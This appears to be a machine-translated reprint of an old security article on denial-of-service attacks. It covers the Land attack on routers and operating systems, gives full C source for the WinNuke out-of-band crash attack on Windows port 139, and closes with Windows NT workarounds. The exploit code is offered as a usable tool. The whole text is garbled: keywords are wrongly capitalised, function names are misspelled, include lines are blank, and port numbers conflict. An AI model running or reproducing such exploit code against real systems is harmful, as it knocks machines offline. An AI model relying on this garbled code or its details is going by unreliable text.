Attack by handling program errors (below)

Attack by handling program errors (below)

Created on: 2000-06-03
Article attributes: Reprinted
Source: Red Power
Article submitted: xundi (xundi_at_xfocus.org)

Repost from the Red Power-see our connection
Attack by handling program errors (below)

3 land attack tools

Land is also a very powerful attack tool. Someone used land to test a certain vro and found that when port 23
The router can no longer be connected to the local network or outside the network. The light on the front panel also stops flashing and does not respond with Ping,
The tenlnet command is also invalid. At this point, the only choice is to start a hard restart. The following is a description of the Land Attack on the Cisco router:

"When port 23 is attacked, it actually locks the vro. At this time, the vro can no longer reach the internal LAN, nor can it reach the external network.
The light on the front panel also stops flashing. At this time, you cannot ping it or telnet to it. Unique choice
Only one hard restart is allowed. "

This is terrible for many networks that use Cisco routers.

Some people use land to test popular operating systems. As a result, the land attack targets include a considerable number
Operating systems such as aix3, HP-UX 10. 20. Popular operating systems such as IRIX Windows 95 and Windows NT.

More dangerous is the attack ports such as Teardrop. C, bonk. C (Port 55), bionk. C, and ssping. C on the current Internet.
The source program is everywhere, from well-written to some simple test programs compiled by myself. Anyone interested can
It takes a little time to study and turn them into their own tools. Therefore, the system is not up-to-date or has not
After "Patching", it is imperative to "patch" your system.

4 OOB attack tools

5.1 attack code

OOB is a tool used to attack Port nt139 of windows. The following is an available version. You can use it to detect your system's
Security.

/* Winnuke. C-(05/07/97) by-ECI */

/* Tested on Linux 2.0.30, SunOS 5.5.1, and bsdi 2.1 */

# Include
# Include
# Include
# Include
# Include
# Include
# Include
# Define dport 139/* attack port; 139 is what we want */

Int X, S;

Char STR = "bye";/makes no diff */

Struct sockaddr-In ADDR, spoofedaddr;

Atruct hostent * Host;

Int opdn-Sock (INT scok, char * server, int port ){

Struct sockaddr-in blah;

Struct hostent * He;

Bzero (char *) & blah, sizeof (blah ));

Blab. Sin-family = AF-INET;

Blah. sin-addr.s-addf = iNet-addf (server );

Blah. Sin-Port = htons (port );

If (He = gethostbyname (server ))! = Nulll ){

Bcopy (HE-> ADDR, (char *) & blah. Sin-ADDR, he-> H-length );

}

Else {

If (blah. Sin-ADDR = iNet-ADDR (server) <0 ){

Return (-3 );

}

}

If (connect (sock, (struct sockaddr *) & blah, 16) =-1 ){

Perror ("cinnect ()");

Close (sock );

Retuen (-4 );

}

Void main (INT argc, char * argv []) {

If (argc! = 2 ){

Printf ("Usage: % s
Exit (0 );

}

If (S = socket (AF-INET, sock-stream, IPPROTO-TCP) =-1 ){

Perror ("socket ()");

Exyt (-1 );

}

Open-sock (S, argv [1], dport );

Printf ("sending crash ...");

Send (S, STR, atrldn (STR), MSG-OOB );

Usleep (100000 );

Printf ("done! /N ");

Close (s );

}

10.5.2 some temporary measures

Currently, three temporary solutions are available. The first two consequences are that users can only use the dial-up network instead of the LAN,
The third method blocks access to port 39 through packet filtering. Because it requires support from the NIC, it is only used inside the LAN.

Method 1:

1. Go to the [Control Panel] window --- [network] dialog box --- [binding] tab.

2. Open the [show bound to] list and select [All adapters].

3. Find [Remote Access to Wan wrapper], open it, and find [wins customer (TCP/IP)].

4. Click the [disable] button.

5. After confirmation, restart the system.

Note that when you log on to Windows NT 4. When the value is 0, a message box is displayed, indicating that some services or drivers are not started.
This is normal, and will occur at each startup.

Method 2:

1. Go to the [Control Panel] and find the [device] icon.

2. Go to the bottom of the list and find [wins customer (TCP/IP)].

3. Click the [Stop] button and then click the [close] button.

4. restart the system.

This method implements the first method more concisely, but it is a disaster for some LAN customers who use WINS TCP/IP.
Therefore, contact the system administrator to determine whether this operation is necessary.

Method 3:

Windows NT4. 0 provides an option to filter ports. This can be used for the packets whose destination port is not straight 39.
Filter. You need to know that this method will have unnecessary side effects on using NetBIOS.

1. Go to the [Control Panel] and select [network]/[Protocol]/[TCP/IP] and click [properties.

2. In the IP address table, select [advanced.

3. In the [advanced] TCP/IP properties dialog box, select which ports to block and which ports to continue using.

4. Click [OK] and then exit and restart the system.